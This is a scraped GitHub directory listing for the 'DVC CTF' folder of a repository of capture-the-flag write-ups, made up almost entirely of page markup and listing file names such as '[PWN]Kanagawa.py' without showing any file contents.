<span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div> Sign up </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div data-pjax-replace id="js-flash-container"> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container > <div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace> <div class="d-flex mb-3 px-3 px-md-4 px-lg-5"> <div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> hugoreb </span> <span>/</span> CTF-Writeups <span></span><span>Public</span></h1> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications <div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span> 0 </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork 0 </div> <div id="responsive-meta-container" data-pjax-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/hugoreb/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></div></details></div></nav> </div> <div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " > <div> <div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>main</span> <span></span> </summary> <div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header> <input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div> <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div> <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/hugoreb/CTF-Writeups/refs" cache-key="v0:1615746136.3003929" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="aHVnb3JlYi9DVEYtV3JpdGV1cHM=" prefetch-on-mouseover > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <footer class="SelectMenu-footer">View all branches</footer> </ref-selector> </div> <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/hugoreb/CTF-Writeups/refs" cache-key="v0:1615746136.3003929" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="aHVnb3JlYi9DVEYtV3JpdGV1cHM=" > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div> </details> </div> <div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF-Writeups</span></span></span><span>/</span>DVC CTF<span>/</span> </div> </div> <div class="d-flex"> Go to file </div> </div> <div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF-Writeups</span></span></span><span>/</span>DVC CTF<span>/</span></div> <div class="Box mb-3"> <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-1 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/hugoreb/CTF-Writeups/tree-commit/2cec1f8a7cc9e3ca83b4a7c558a62c6efcda5691/DVC%20CTF" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path fill-rule="evenodd" d="M1.643 3.143L.427 1.927A.25.25 0 000 2.104V5.75c0 .138.112.25.25.25h3.646a.25.25 0 00.177-.427L2.715 4.215a6.5 6.5 0 11-1.18 4.458.75.75 0 10-1.493.154 8.001 8.001 0 101.6-5.684zM7.75 4a.75.75 0 01.75.75v2.992l2.028.812a.75.75 0 01-.557 1.392l-2.5-1A.75.75 0 017 8.25v-3.5A.75.75 0 017.75 4z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2> <include-fragment src="/hugoreb/CTF-Writeups/file-list/main/DVC%20CTF"> Permalink <div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> Failed to load latest commit information. </div> <div class="js-details-container Details"> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block" data-pjax> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>WriteUps</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>[PWN]Kanagawa.py</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 